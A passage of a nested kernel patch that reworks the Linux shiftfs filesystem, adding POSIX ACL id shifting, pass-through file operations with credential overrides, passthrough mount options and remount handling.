++			entry->e_id = cpu_to_le32(from_kgid(&init_user_ns, kgid));
++			break;
++		default:
++			break;
++		}
++	}
+ }
+ 
+-static int shiftfs_show_options(struct seq_file *m, struct dentry *dentry)
++static struct posix_acl *shiftfs_get_acl(struct inode *inode, int type)
+ {
+-	struct super_block *sb = dentry->d_sb;
+-	struct shiftfs_super_info *ssi = sb->s_fs_info;
++	struct inode *loweri = inode->i_private;
++	const struct cred *oldcred;
++	struct posix_acl *lower_acl, *acl = NULL;
++	struct user_namespace *from_ns = loweri->i_sb->s_user_ns;
++	struct user_namespace *to_ns = inode->i_sb->s_user_ns;
++	int size;
++	int err;
+ 
+-	if (ssi->mark)
+-		seq_show_option(m, "mark", NULL);
++	if (!IS_POSIXACL(loweri))
++		return NULL;
+ 
+-	return 0;
+-}
++	oldcred = shiftfs_override_creds(inode->i_sb);
++	lower_acl = get_acl(loweri, type);
++	revert_creds(oldcred);
+ 
+-static int shiftfs_statfs(struct dentry *dentry, struct kstatfs *buf)
+-{
+-	struct super_block *sb = dentry->d_sb;
+-	struct shiftfs_super_info *ssi = sb->s_fs_info;
+-	struct dentry *root = sb->s_root;
+-	struct dentry *realroot = root->d_fsdata;
+-	struct path realpath = { .mnt = ssi->mnt, .dentry = realroot };
+-	int err;
++	if (lower_acl && !IS_ERR(lower_acl)) {
++		/* XXX: export posix_acl_clone? */
++		size = sizeof(struct posix_acl) +
++		       lower_acl->a_count * sizeof(struct posix_acl_entry);
++		acl = kmemdup(lower_acl, size, GFP_KERNEL);
++		posix_acl_release(lower_acl);
+ 
+-	err = vfs_statfs(&realpath, buf);
+-	if (err)
+-		return err;
++		if (!acl)
++			return ERR_PTR(-ENOMEM);
+ 
+-	buf->f_type = sb->s_magic;
++		refcount_set(&acl->a_refcount, 1);
+ 
+-	return 0;
++		err = shift_acl_ids(from_ns, to_ns, acl);
++		if (err) {
++			kfree(acl);
++			return ERR_PTR(err);
++		}
++	}
++
++	return acl;
+ }
+ 
+-static void shiftfs_put_super(struct super_block *sb)
++static int
++shiftfs_posix_acl_xattr_get(const struct xattr_handler *handler,
++			   struct dentry *dentry, struct inode *inode,
++			   const char *name, void *buffer, size_t size)
+ {
+-	struct shiftfs_super_info *ssi = sb->s_fs_info;
++	struct inode *loweri = inode->i_private;
++	int ret;
++
++	ret = shiftfs_xattr_get(NULL, dentry, inode, handler->name,
++				buffer, size);
++	if (ret < 0)
++		return ret;
+ 
+-	mntput(ssi->mnt);
+-	put_user_ns(ssi->userns);
+-	kfree(ssi);
++	inode_lock(loweri);
++	shift_acl_xattr_ids(loweri->i_sb->s_user_ns, inode->i_sb->s_user_ns,
++			    buffer, size);
++	inode_unlock(loweri);
++	return ret;
+ }
+ 
+-static const struct xattr_handler shiftfs_xattr_handler = {
+-	.prefix = "",
+-	.get    = shiftfs_xattr_get,
+-	.set    = shiftfs_xattr_set,
+-};
++static int
++shiftfs_posix_acl_xattr_set(const struct xattr_handler *handler,
++			    struct dentry *dentry, struct inode *inode,
++			    const char *name, const void *value,
++			    size_t size, int flags)
++{
++	struct inode *loweri = inode->i_private;
++	int err;
+ 
+-const struct xattr_handler *shiftfs_xattr_handlers[] = {
+-	&shiftfs_xattr_handler,
+-	NULL
+-};
++	if (!IS_POSIXACL(loweri) || !loweri->i_op->set_acl)
++		return -EOPNOTSUPP;
++	if (handler->flags == ACL_TYPE_DEFAULT && !S_ISDIR(inode->i_mode))
++		return value ? -EACCES : 0;
++	if (!inode_owner_or_capable(inode))
++		return -EPERM;
++
++	if (value) {
++		shift_acl_xattr_ids(inode->i_sb->s_user_ns,
++				    loweri->i_sb->s_user_ns,
++				    (void *)value, size);
++		err = shiftfs_setxattr(dentry, inode, handler->name, value,
++				       size, flags);
++	} else {
++		err = shiftfs_removexattr(dentry, handler->name);
++	}
+ 
+-static const struct super_operations shiftfs_super_ops = {
+-	.put_super	= shiftfs_put_super,
+-	.show_options	= shiftfs_show_options,
+-	.statfs		= shiftfs_statfs,
++	if (!err)
++		shiftfs_copyattr(loweri, inode);
++
++	return err;
++}
++
++static const struct xattr_handler
++shiftfs_posix_acl_access_xattr_handler = {
++	.name = XATTR_NAME_POSIX_ACL_ACCESS,
++	.flags = ACL_TYPE_ACCESS,
++	.get = shiftfs_posix_acl_xattr_get,
++	.set = shiftfs_posix_acl_xattr_set,
+ };
+ 
+-struct shiftfs_data {
+-	void *data;
+-	const char *path;
++static const struct xattr_handler
++shiftfs_posix_acl_default_xattr_handler = {
++	.name = XATTR_NAME_POSIX_ACL_DEFAULT,
++	.flags = ACL_TYPE_DEFAULT,
++	.get = shiftfs_posix_acl_xattr_get,
++	.set = shiftfs_posix_acl_xattr_set,
+ };
+ 
+-static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
+-			      int silent)
+-{
+-	struct shiftfs_data *data = raw_data;
+-	char *name = kstrdup(data->path, GFP_KERNEL);
+-	int err = -ENOMEM;
+-	struct shiftfs_super_info *ssi = NULL;
+-	struct path path;
+-	struct dentry *dentry;
++#else /* !CONFIG_SHIFT_FS_POSIX_ACL */
+ 
+-	if (!name)
+-		goto out;
++#define shiftfs_get_acl NULL
+ 
+-	ssi = kzalloc(sizeof(*ssi), GFP_KERNEL);
+-	if (!ssi)
+-		goto out;
++#endif /* CONFIG_SHIFT_FS_POSIX_ACL */
+ 
+-	err = -EPERM;
+-	err = shiftfs_parse_options(ssi, data->data);
++static const struct inode_operations shiftfs_dir_inode_operations = {
++	.lookup		= shiftfs_lookup,
++	.mkdir		= shiftfs_mkdir,
++	.symlink	= shiftfs_symlink,
++	.unlink		= shiftfs_unlink,
++	.rmdir		= shiftfs_rmdir,
++	.rename		= shiftfs_rename,
++	.link		= shiftfs_link,
++	.setattr	= shiftfs_setattr,
++	.create		= shiftfs_create,
++	.mknod		= shiftfs_mknod,
++	.permission	= shiftfs_permission,
++	.getattr	= shiftfs_getattr,
++	.listxattr	= shiftfs_listxattr,
++	.get_acl	= shiftfs_get_acl,
++};
++
++static const struct inode_operations shiftfs_file_inode_operations = {
++	.fiemap		= shiftfs_fiemap,
++	.getattr	= shiftfs_getattr,
++	.get_acl	= shiftfs_get_acl,
++	.listxattr	= shiftfs_listxattr,
++	.permission	= shiftfs_permission,
++	.setattr	= shiftfs_setattr,
++	.tmpfile	= shiftfs_tmpfile,
++};
++
++static const struct inode_operations shiftfs_special_inode_operations = {
++	.getattr	= shiftfs_getattr,
++	.get_acl	= shiftfs_get_acl,
++	.listxattr	= shiftfs_listxattr,
++	.permission	= shiftfs_permission,
++	.setattr	= shiftfs_setattr,
++};
++
++static const struct inode_operations shiftfs_symlink_inode_operations = {
++	.getattr	= shiftfs_getattr,
++	.get_link	= shiftfs_get_link,
++	.listxattr	= shiftfs_listxattr,
++	.setattr	= shiftfs_setattr,
++};
++
++static struct file *shiftfs_open_realfile(const struct file *file,
++					  struct path *realpath)
++{
++	struct file *lowerf;
++	const struct cred *oldcred;
++	struct inode *inode = file_inode(file);
++	struct inode *loweri = realpath->dentry->d_inode;
++	struct shiftfs_super_info *info = inode->i_sb->s_fs_info;
++
++	oldcred = shiftfs_override_creds(inode->i_sb);
++	/* XXX: open_with_fake_path() not gauranteed to stay around, if
++	 * removed use dentry_open() */
++	lowerf = open_with_fake_path(realpath, file->f_flags, loweri, info->creator_cred);
++	revert_creds(oldcred);
++
++	return lowerf;
++}
++
++#define SHIFTFS_SETFL_MASK (O_APPEND | O_NONBLOCK | O_NDELAY | O_DIRECT)
++
++static int shiftfs_change_flags(struct file *file, unsigned int flags)
++{
++	struct inode *inode = file_inode(file);
++	int err;
++
++	/* if some flag changed that cannot be changed then something's amiss */
++	if (WARN_ON((file->f_flags ^ flags) & ~SHIFTFS_SETFL_MASK))
++		return -EIO;
++
++	flags &= SHIFTFS_SETFL_MASK;
++
++	if (((flags ^ file->f_flags) & O_APPEND) && IS_APPEND(inode))
++		return -EPERM;
++
++	if (flags & O_DIRECT) {
++		if (!file->f_mapping->a_ops ||
++		    !file->f_mapping->a_ops->direct_IO)
++			return -EINVAL;
++	}
++
++	if (file->f_op->check_flags) {
++		err = file->f_op->check_flags(flags);
++		if (err)
++			return err;
++	}
++
++	spin_lock(&file->f_lock);
++	file->f_flags = (file->f_flags & ~SHIFTFS_SETFL_MASK) | flags;
++	spin_unlock(&file->f_lock);
++
++	return 0;
++}
++
++static int shiftfs_real_fdget(const struct file *file, struct fd *lowerfd)
++{
++	struct shiftfs_file_info *file_info = file->private_data;
++	struct file *realfile = file_info->realfile;
++
++	lowerfd->flags = 0;
++	lowerfd->file = realfile;
++
++	/* Did the flags change since open? */
++	if (unlikely(file->f_flags & ~lowerfd->file->f_flags))
++		return shiftfs_change_flags(lowerfd->file, file->f_flags);
++
++	return 0;
++}
++
++static int shiftfs_open(struct inode *inode, struct file *file)
++{
++	struct shiftfs_super_info *ssi = inode->i_sb->s_fs_info;
++	struct shiftfs_file_info *file_info;
++	struct file *realfile;
++	struct path *realpath;
++
++	file_info = kmem_cache_zalloc(shiftfs_file_info_cache, GFP_KERNEL);
++	if (!file_info)
++		return -ENOMEM;
++
++	realpath = &file_info->realpath;
++	realpath->mnt = ssi->mnt;
++	realpath->dentry = file->f_path.dentry->d_fsdata;
++
++	realfile = shiftfs_open_realfile(file, realpath);
++	if (IS_ERR(realfile)) {
++		kmem_cache_free(shiftfs_file_info_cache, file_info);
++		return PTR_ERR(realfile);
++	}
++
++	file->private_data = file_info;
++	file_info->realfile = realfile;
++	return 0;
++}
++
++static int shiftfs_release(struct inode *inode, struct file *file)
++{
++	struct shiftfs_file_info *file_info = file->private_data;
++
++	if (file_info) {
++		if (file_info->realfile)
++			fput(file_info->realfile);
++
++		kmem_cache_free(shiftfs_file_info_cache, file_info);
++	}
++
++	return 0;
++}
++
++static loff_t shiftfs_llseek(struct file *file, loff_t offset, int whence)
++{
++	struct inode *realinode = file_inode(file)->i_private;
++
++	return generic_file_llseek_size(file, offset, whence,
++					realinode->i_sb->s_maxbytes,
++					i_size_read(realinode));
++}
++
++/* XXX: Need to figure out what to to about atime updates, maybe other
++ * timestamps too ... ref. ovl_file_accessed() */
++
++static rwf_t shiftfs_iocb_to_rwf(struct kiocb *iocb)
++{
++	int ifl = iocb->ki_flags;
++	rwf_t flags = 0;
++
++	if (ifl & IOCB_NOWAIT)
++		flags |= RWF_NOWAIT;
++	if (ifl & IOCB_HIPRI)
++		flags |= RWF_HIPRI;
++	if (ifl & IOCB_DSYNC)
++		flags |= RWF_DSYNC;
++	if (ifl & IOCB_SYNC)
++		flags |= RWF_SYNC;
++
++	return flags;
++}
++
++static ssize_t shiftfs_read_iter(struct kiocb *iocb, struct iov_iter *iter)
++{
++	struct file *file = iocb->ki_filp;
++	struct fd lowerfd;
++	const struct cred *oldcred;
++	ssize_t ret;
++
++	if (!iov_iter_count(iter))
++		return 0;
++
++	ret = shiftfs_real_fdget(file, &lowerfd);
++	if (ret)
++		return ret;
++
++	oldcred = shiftfs_override_creds(file->f_path.dentry->d_sb);
++	ret = vfs_iter_read(lowerfd.file, iter, &iocb->ki_pos,
++			    shiftfs_iocb_to_rwf(iocb));
++	revert_creds(oldcred);
++
++	shiftfs_file_accessed(file);
++
++	fdput(lowerfd);
++	return ret;
++}
++
++static ssize_t shiftfs_write_iter(struct kiocb *iocb, struct iov_iter *iter)
++{
++	struct file *file = iocb->ki_filp;
++	struct inode *inode = file_inode(file);
++	struct fd lowerfd;
++	const struct cred *oldcred;
++	ssize_t ret;
++
++	if (!iov_iter_count(iter))
++		return 0;
++
++	inode_lock(inode);
++	/* Update mode */
++	shiftfs_copyattr(inode->i_private, inode);
++	ret = file_remove_privs(file);
++	if (ret)
++		goto out_unlock;
++
++	ret = shiftfs_real_fdget(file, &lowerfd);
++	if (ret)
++		goto out_unlock;
++
++	oldcred = shiftfs_override_creds(file->f_path.dentry->d_sb);
++	file_start_write(lowerfd.file);
++	ret = vfs_iter_write(lowerfd.file, iter, &iocb->ki_pos,
++			     shiftfs_iocb_to_rwf(iocb));
++	file_end_write(lowerfd.file);
++	revert_creds(oldcred);
++
++	/* Update size */
++	shiftfs_copyattr(inode->i_private, inode);
++
++	fdput(lowerfd);
++
++out_unlock:
++	inode_unlock(inode);
++	return ret;
++}
++
++static int shiftfs_fsync(struct file *file, loff_t start, loff_t end,
++			 int datasync)
++{
++	struct fd lowerfd;
++	const struct cred *oldcred;
++	int ret;
++
++	ret = shiftfs_real_fdget(file, &lowerfd);
++	if (ret)
++		return ret;
++
++	oldcred = shiftfs_override_creds(file->f_path.dentry->d_sb);
++	ret = vfs_fsync_range(lowerfd.file, start, end, datasync);
++	revert_creds(oldcred);
++
++	fdput(lowerfd);
++	return ret;
++}
++
++static int shiftfs_mmap(struct file *file, struct vm_area_struct *vma)
++{
++	struct shiftfs_file_info *file_info = file->private_data;
++	struct file *realfile = file_info->realfile;
++	const struct cred *oldcred;
++	int ret;
++
++	if (!realfile->f_op->mmap)
++		return -ENODEV;
++
++	if (WARN_ON(file != vma->vm_file))
++		return -EIO;
++
++	oldcred = shiftfs_override_creds(file->f_path.dentry->d_sb);
++	vma->vm_file = get_file(realfile);
++	ret = call_mmap(vma->vm_file, vma);
++	revert_creds(oldcred);
++
++	shiftfs_file_accessed(file);
++
++	if (ret)
++		fput(realfile); /* Drop refcount from new vm_file value */
++	else
++		fput(file); /* Drop refcount from previous vm_file value */
++
++	return ret;
++}
++
++static long shiftfs_fallocate(struct file *file, int mode, loff_t offset,
++			      loff_t len)
++{
++	struct inode *inode = file_inode(file);
++	struct inode *loweri = inode->i_private;
++	struct fd lowerfd;
++	const struct cred *oldcred;
++	int ret;
++
++	ret = shiftfs_real_fdget(file, &lowerfd);
++	if (ret)
++		return ret;
++
++	oldcred = shiftfs_override_creds(file->f_path.dentry->d_sb);
++	ret = vfs_fallocate(lowerfd.file, mode, offset, len);
++	revert_creds(oldcred);
++
++	/* Update size */
++	shiftfs_copyattr(loweri, inode);
++
++	fdput(lowerfd);
++	return ret;
++}
++
++static int shiftfs_fadvise(struct file *file, loff_t offset, loff_t len,
++			   int advice)
++{
++	struct fd lowerfd;
++	const struct cred *oldcred;
++	int ret;
++
++	ret = shiftfs_real_fdget(file, &lowerfd);
++	if (ret)
++		return ret;
++
++	oldcred = shiftfs_override_creds(file->f_path.dentry->d_sb);
++	ret = vfs_fadvise(lowerfd.file, offset, len, advice);
++	revert_creds(oldcred);
++
++	fdput(lowerfd);
++	return ret;
++}
++
++static int shiftfs_override_ioctl_creds(const struct super_block *sb,
++					const struct cred **oldcred,
++					struct cred **newcred)
++{
++	kuid_t fsuid = current_fsuid();
++	kgid_t fsgid = current_fsgid();
++
++	*oldcred = shiftfs_override_creds(sb);
++
++	*newcred = prepare_creds();
++	if (!*newcred) {
++		revert_creds(*oldcred);
++		return -ENOMEM;
++	}
++
++	(*newcred)->fsuid = KUIDT_INIT(from_kuid(sb->s_user_ns, fsuid));
++	(*newcred)->fsgid = KGIDT_INIT(from_kgid(sb->s_user_ns, fsgid));
++
++	/* clear all caps to prevent bypassing capable() checks */
++	cap_clear((*newcred)->cap_bset);
++	cap_clear((*newcred)->cap_effective);
++	cap_clear((*newcred)->cap_inheritable);
++	cap_clear((*newcred)->cap_permitted);
++
++	put_cred(override_creds(*newcred));
++	return 0;
++}
++
++static inline void shiftfs_revert_ioctl_creds(const struct cred *oldcred,
++					      struct cred *newcred)
++{
++	return shiftfs_revert_object_creds(oldcred, newcred);
++}
++
++static long shiftfs_real_ioctl(struct file *file, unsigned int cmd,
++			       unsigned long arg)
++{
++	long ret = 0;
++	struct fd lowerfd;
++	struct cred *newcred;
++	const struct cred *oldcred;
++	struct super_block *sb = file->f_path.dentry->d_sb;
++
++	ret = shiftfs_real_fdget(file, &lowerfd);
++	if (ret)
++		return ret;
++
++	ret = shiftfs_override_ioctl_creds(sb, &oldcred, &newcred);
++	if (ret)
++		goto out_fdput;
++
++	ret = vfs_ioctl(lowerfd.file, cmd, arg);
++
++	shiftfs_revert_ioctl_creds(oldcred, newcred);
++
++	shiftfs_copyattr(file_inode(lowerfd.file), file_inode(file));
++	shiftfs_copyflags(file_inode(lowerfd.file), file_inode(file));
++
++out_fdput:
++	fdput(lowerfd);
++
++	return ret;
++}
++
++static long shiftfs_ioctl(struct file *file, unsigned int cmd,
++			  unsigned long arg)
++{
++	switch (cmd) {
++	case FS_IOC_GETVERSION:
++		/* fall through */
++	case FS_IOC_GETFLAGS:
++		/* fall through */
++	case FS_IOC_SETFLAGS:
++		break;
++	default:
++		return -ENOTTY;
++	}
++
++	return shiftfs_real_ioctl(file, cmd, arg);
++}
++
++static long shiftfs_compat_ioctl(struct file *file, unsigned int cmd,
++				 unsigned long arg)
++{
++	switch (cmd) {
++	case FS_IOC32_GETVERSION:
++		/* fall through */
++	case FS_IOC32_GETFLAGS:
++		/* fall through */
++	case FS_IOC32_SETFLAGS:
++		break;
++	default:
++		return -ENOIOCTLCMD;
++	}
++
++	return shiftfs_real_ioctl(file, cmd, arg);
++}
++
++enum shiftfs_copyop {
++	SHIFTFS_COPY,
++	SHIFTFS_CLONE,
++	SHIFTFS_DEDUPE,
++};
++
++static ssize_t shiftfs_copyfile(struct file *file_in, loff_t pos_in,
++				struct file *file_out, loff_t pos_out, u64 len,
++				unsigned int flags, enum shiftfs_copyop op)
++{
++	ssize_t ret;
++	struct fd real_in, real_out;
++	const struct cred *oldcred;
++	struct inode *inode_out = file_inode(file_out);
++	struct inode *loweri = inode_out->i_private;
++
++	ret = shiftfs_real_fdget(file_out, &real_out);
++	if (ret)
++		return ret;
++
++	ret = shiftfs_real_fdget(file_in, &real_in);
++	if (ret) {
++		fdput(real_out);
++		return ret;
++	}
++
++	oldcred = shiftfs_override_creds(inode_out->i_sb);
++	switch (op) {
++	case SHIFTFS_COPY:
++		ret = vfs_copy_file_range(real_in.file, pos_in, real_out.file,
++					  pos_out, len, flags);
++		break;
++
++	case SHIFTFS_CLONE:
++		ret = vfs_clone_file_range(real_in.file, pos_in, real_out.file,
++					   pos_out, len, flags);
++		break;
++
++	case SHIFTFS_DEDUPE:
++		ret = vfs_dedupe_file_range_one(real_in.file, pos_in,
++						real_out.file, pos_out, len,
++						flags);
++		break;
++	}
++	revert_creds(oldcred);
++
++	/* Update size */
++	shiftfs_copyattr(loweri, inode_out);
++
++	fdput(real_in);
++	fdput(real_out);
++
++	return ret;
++}
++
++static ssize_t shiftfs_copy_file_range(struct file *file_in, loff_t pos_in,
++				       struct file *file_out, loff_t pos_out,
++				       size_t len, unsigned int flags)
++{
++	return shiftfs_copyfile(file_in, pos_in, file_out, pos_out, len, flags,
++				SHIFTFS_COPY);
++}
++
++static loff_t shiftfs_remap_file_range(struct file *file_in, loff_t pos_in,
++				       struct file *file_out, loff_t pos_out,
++				       loff_t len, unsigned int remap_flags)
++{
++	enum shiftfs_copyop op;
++
++	if (remap_flags & ~(REMAP_FILE_DEDUP | REMAP_FILE_ADVISORY))
++		return -EINVAL;
++
++	if (remap_flags & REMAP_FILE_DEDUP)
++		op = SHIFTFS_DEDUPE;
++	else
++		op = SHIFTFS_CLONE;
++
++	return shiftfs_copyfile(file_in, pos_in, file_out, pos_out, len,
++				remap_flags, op);
++}
++
++static int shiftfs_iterate_shared(struct file *file, struct dir_context *ctx)
++{
++	const struct cred *oldcred;
++	int err = -ENOTDIR;
++	struct shiftfs_file_info *file_info = file->private_data;
++	struct file *realfile = file_info->realfile;
++
++	oldcred = shiftfs_override_creds(file->f_path.dentry->d_sb);
++	err = iterate_dir(realfile, ctx);
++	revert_creds(oldcred);
++
++	return err;
++}
++
++const struct file_operations shiftfs_file_operations = {
++	.open			= shiftfs_open,
++	.release		= shiftfs_release,
++	.llseek			= shiftfs_llseek,
++	.read_iter		= shiftfs_read_iter,
++	.write_iter		= shiftfs_write_iter,
++	.fsync			= shiftfs_fsync,
++	.mmap			= shiftfs_mmap,
++	.fallocate		= shiftfs_fallocate,
++	.fadvise		= shiftfs_fadvise,
++	.unlocked_ioctl		= shiftfs_ioctl,
++	.compat_ioctl		= shiftfs_compat_ioctl,
++	.copy_file_range	= shiftfs_copy_file_range,
++	.remap_file_range	= shiftfs_remap_file_range,
++};
++
++const struct file_operations shiftfs_dir_operations = {
++	.compat_ioctl		= shiftfs_compat_ioctl,
++	.fsync			= shiftfs_fsync,
++	.iterate_shared		= shiftfs_iterate_shared,
++	.llseek			= shiftfs_llseek,
++	.open			= shiftfs_open,
++	.read			= generic_read_dir,
++	.release		= shiftfs_release,
++	.unlocked_ioctl		= shiftfs_ioctl,
++};
++
++static const struct address_space_operations shiftfs_aops = {
++	/* For O_DIRECT dentry_open() checks f_mapping->a_ops->direct_IO */
++	.direct_IO	= noop_direct_IO,
++};
++
++static void shiftfs_fill_inode(struct inode *inode, unsigned long ino,
++			       umode_t mode, dev_t dev, struct dentry *dentry)
++{
++	struct inode *loweri;
++
++	inode->i_ino = ino;
++	inode->i_flags |= S_NOCMTIME;
++
++	mode &= S_IFMT;
++	inode->i_mode = mode;
++	switch (mode & S_IFMT) {
++	case S_IFDIR:
++		inode->i_op = &shiftfs_dir_inode_operations;
++		inode->i_fop = &shiftfs_dir_operations;
++		break;
++	case S_IFLNK:
++		inode->i_op = &shiftfs_symlink_inode_operations;
++		break;
++	case S_IFREG:
++		inode->i_op = &shiftfs_file_inode_operations;
++		inode->i_fop = &shiftfs_file_operations;
++		inode->i_mapping->a_ops = &shiftfs_aops;
++		break;
++	default:
++		inode->i_op = &shiftfs_special_inode_operations;
++		init_special_inode(inode, mode, dev);
++		break;
++	}
++
++	if (!dentry)
++		return;
++
++	loweri = dentry->d_inode;
++	if (!loweri->i_op->get_link)
++		inode->i_opflags |= IOP_NOFOLLOW;
++
++	shiftfs_copyattr(loweri, inode);
++	shiftfs_copyflags(loweri, inode);
++	set_nlink(inode, loweri->i_nlink);
++}
++
++static int shiftfs_show_options(struct seq_file *m, struct dentry *dentry)
++{
++	struct super_block *sb = dentry->d_sb;
++	struct shiftfs_super_info *sbinfo = sb->s_fs_info;
++
++	if (sbinfo->mark)
++		seq_show_option(m, "mark", NULL);
++
++	if (sbinfo->passthrough)
++		seq_printf(m, ",passthrough=%u", sbinfo->passthrough);
++
++	return 0;
++}
++
++static int shiftfs_statfs(struct dentry *dentry, struct kstatfs *buf)
++{
++	struct super_block *sb = dentry->d_sb;
++	struct shiftfs_super_info *sbinfo = sb->s_fs_info;
++	struct dentry *root = sb->s_root;
++	struct dentry *realroot = root->d_fsdata;
++	struct path realpath = { .mnt = sbinfo->mnt, .dentry = realroot };
++	int err;
++
++	err = vfs_statfs(&realpath, buf);
+ 	if (err)
+-		goto out;
++		return err;
+ 
+-	/* to mark a mount point, must be real root */
+-	if (ssi->mark && !capable(CAP_SYS_ADMIN))
+-		goto out;
++	if (!shiftfs_passthrough_statfs(sbinfo))
++		buf->f_type = sb->s_magic;
+ 
+-	/* else to mount a mark, must be userns admin */
+-	if (!ssi->mark && !ns_capable(current_user_ns(), CAP_SYS_ADMIN))
+-		goto out;
++	return 0;
++}
+ 
+-	err = kern_path(name, LOOKUP_FOLLOW, &path);
++static void shiftfs_evict_inode(struct inode *inode)
++{
++	struct inode *loweri = inode->i_private;
++
++	clear_inode(inode);
++
++	if (loweri)
++		iput(loweri);
++}
++
++static void shiftfs_put_super(struct super_block *sb)
++{
++	struct shiftfs_super_info *sbinfo = sb->s_fs_info;
++
++	if (sbinfo) {
++		mntput(sbinfo->mnt);
++		put_cred(sbinfo->creator_cred);
++		kfree(sbinfo);
++	}
++}
++
++static const struct xattr_handler shiftfs_xattr_handler = {
++	.prefix = "",
++	.get    = shiftfs_xattr_get,
++	.set    = shiftfs_xattr_set,
++};
++
++const struct xattr_handler *shiftfs_xattr_handlers[] = {
++#ifdef CONFIG_SHIFT_FS_POSIX_ACL
++	&shiftfs_posix_acl_access_xattr_handler,
++	&shiftfs_posix_acl_default_xattr_handler,
++#endif
++	&shiftfs_xattr_handler,
++	NULL
++};
++
++static inline bool passthrough_is_subset(int old_flags, int new_flags)
++{
++	if ((new_flags & old_flags) != new_flags)
++		return false;
++
++	return true;
++}
++
++static int shiftfs_remount(struct super_block *sb, int *flags, char *data)
++{
++	int err;
++	struct shiftfs_super_info new = {};
++	struct shiftfs_super_info *info = sb->s_fs_info;
++
++	err = shiftfs_parse_mount_options(&new, data);
+ 	if (err)
+-		goto out;
++		return err;
++
++	/* Mark mount option cannot be changed. */
++	if (info->mark || (info->mark != new.mark))
++		return -EPERM;
++
++	if (info->passthrough != new.passthrough) {
++		/* Don't allow exceeding passthrough options of mark mount. */
++		if (!passthrough_is_subset(info->info_mark->passthrough,
++					   info->passthrough))
++			return -EPERM;
++
++		info->passthrough = new.passthrough;
++	}
++
++	return 0;
++}
+ 
+-	err = -EPERM;
++static const struct super_operations shiftfs_super_ops = {
++	.put_super	= shiftfs_put_super,
++	.show_options	= shiftfs_show_options,
++	.statfs		= shiftfs_statfs,
++	.remount_fs	= shiftfs_remount,
++	.evict_inode	= shiftfs_evict_inode,
++};
++
++struct shiftfs_data {
++	void *data;
++	const char *path;
++};
++
++static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
++			      int silent)
++{
++	int err;
++	struct path path = {};
++	struct shiftfs_super_info *sbinfo_mp;
++	char *name = NULL;
++	struct inode *inode = NULL;
++	struct dentry *dentry = NULL;
++	struct shiftfs_data *data = raw_data;
++	struct shiftfs_super_info *sbinfo = NULL;
++
++	if (!data->path)
++		return -EINVAL;
++
++	sb->s_fs_info = kzalloc(sizeof(*sbinfo), GFP_KERNEL);
++	if (!sb->s_fs_info)
++		return -ENOMEM;
++	sbinfo = sb->s_fs_info;
++
++	err = shiftfs_parse_mount_options(sbinfo, data->data);
++	if (err)
++		return err;
++
++	/* to mount a mark, must be userns admin */
++	if (!sbinfo->mark && !ns_capable(current_user_ns(), CAP_SYS_ADMIN))
++		return -EPERM;
++
++	name = kstrdup(data->path, GFP_KERNEL);
++	if (!name)
++		return -ENOMEM;
++
++	err = kern_path(name, LOOKUP_FOLLOW, &path);
++	if (err)
++		goto out_free_name;
+ 
+ 	if (!S_ISDIR(path.dentry->d_inode->i_mode)) {
+ 		err = -ENOTDIR;
+-		goto out_put;
++		goto out_put_path;
+ 	}
+ 
+-	sb->s_stack_depth = path.dentry->d_sb->s_stack_depth + 1;
+-	if (sb->s_stack_depth > FILESYSTEM_MAX_STACK_DEPTH) {
+-		printk(KERN_ERR "shiftfs: maximum stacking depth exceeded\n");
+-		err = -EINVAL;
+-		goto out_put;
+-	}
++	if (sbinfo->mark) {
++		struct super_block *lower_sb = path.mnt->mnt_sb;
++
++		/* to mark a mount point, must root wrt lower s_user_ns */
++		if (!ns_capable(lower_sb->s_user_ns, CAP_SYS_ADMIN)) {
++			err = -EPERM;
++			goto out_put_path;
++		}
+ 
+-	if (ssi->mark) {
+ 		/*
+ 		 * this part is visible unshifted, so make sure no
+ 		 * executables that could be used to give suid
+ 		 * privileges
+ 		 */
+ 		sb->s_iflags = SB_I_NOEXEC;
+-		ssi->mnt = path.mnt;
+-		dentry = path.dentry;
+-	} else {
+-		struct shiftfs_super_info *mp_ssi;
+ 
+ 		/*
+-		 * this leg executes if we're admin capable in
+-		 * the namespace, so be very careful
++		 * Handle nesting of shiftfs mounts by referring this mark
++		 * mount back to the original mark mount. This is more
++		 * efficient and alleviates concerns about stack depth.
+ 		 */
++		if (lower_sb->s_magic == SHIFTFS_MAGIC) {
++			sbinfo_mp = lower_sb->s_fs_info;
++
++			/* Doesn't make sense to mark a mark mount */
++			if (sbinfo_mp->mark) {
++				err = -EINVAL;
++				goto out_put_path;
++			}
++
++			if (!passthrough_is_subset(sbinfo_mp->passthrough,
++						   sbinfo->passthrough)) {
++				err = -EPERM;
++				goto out_put_path;
++			}
++
++			sbinfo->mnt = mntget(sbinfo_mp->mnt);
++			dentry = dget(path.dentry->d_fsdata);
++		} else {
++			sbinfo->mnt = mntget(path.mnt);
++			dentry = dget(path.dentry);
++		}
++
++		sbinfo->creator_cred = prepare_creds();
++		if (!sbinfo->creator_cred) {
++			err = -ENOMEM;
++			goto out_put_path;
++		}
++	} else {
++		/*
++		 * This leg executes if we're admin capable in the namespace,
++		 * so be very careful.
++		 */
++		err = -EPERM;
+ 		if (path.dentry->d_sb->s_magic != SHIFTFS_MAGIC)
+-			goto out_put;
+-		mp_ssi = path.dentry->d_sb->s_fs_info;
+-		if (!mp_ssi->mark)
+-			goto out_put;
+-		ssi->mnt = mntget(mp_ssi->mnt);
++			goto out_put_path;
++
++		sbinfo_mp = path.dentry->d_sb->s_fs_info;
++		if (!sbinfo_mp->mark)
++			goto out_put_path;
++
++		if (!passthrough_is_subset(sbinfo_mp->passthrough,
++					   sbinfo->passthrough))
++			goto out_put_path;
++
++		sbinfo->mnt = mntget(sbinfo_mp->mnt);
++		sbinfo->creator_cred = get_cred(sbinfo_mp->creator_cred);
+ 		dentry = dget(path.dentry->d_fsdata);
+-		path_put(&path);
++		sbinfo->info_mark = sbinfo_mp;
++	}
++
++	sb->s_stack_depth = dentry->d_sb->s_stack_depth + 1;
++	if (sb->s_stack_depth > FILESYSTEM_MAX_STACK_DEPTH) {
++		printk(KERN_ERR "shiftfs: maximum stacking depth exceeded\n");
++		err = -EINVAL;
++		goto out_put_path;
++	}
++
++	inode = new_inode(sb);
++	if (!inode) {
++		err = -ENOMEM;
++		goto out_put_path;
+ 	}
+-	ssi->userns = get_user_ns(dentry->d_sb->s_user_ns);
+-	sb->s_fs_info = ssi;
++	shiftfs_fill_inode(inode, dentry->d_inode->i_ino, S_IFDIR, 0, dentry);
++
++	ihold(dentry->d_inode);
++	inode->i_private = dentry->d_inode;
++
+ 	sb->s_magic = SHIFTFS_MAGIC;
